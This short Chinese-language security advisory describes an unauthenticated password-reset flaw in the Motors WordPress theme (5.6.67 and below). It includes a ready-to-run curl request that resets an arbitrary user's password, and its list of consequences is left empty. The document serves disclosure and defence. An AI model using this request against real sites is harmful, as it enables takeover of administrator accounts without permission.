Motors WordPress主题(版本5.6.67及以下)在密码重置功能中存在一个严重认证缺陷。
该主题通过端点提供了一个前端密码更新机制,但在处理密码更改之前未能正确验证用户身份或授权。
因此,未认证的攻击者可以发送精心构造的HTTP请求,提供user_id、任意hash_check以及新密码(stm_new_password),从而重置任意用户(包括管理员)的密码。
如果被利用,攻击者可以:
此漏洞特别危险,因为它无需登录,而且除非监控日志,否则通常不会留下明显痕迹。
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
本报告仅供教育和授权安全测试目的使用。
未经许可利用此漏洞可能违反法律和道德界限。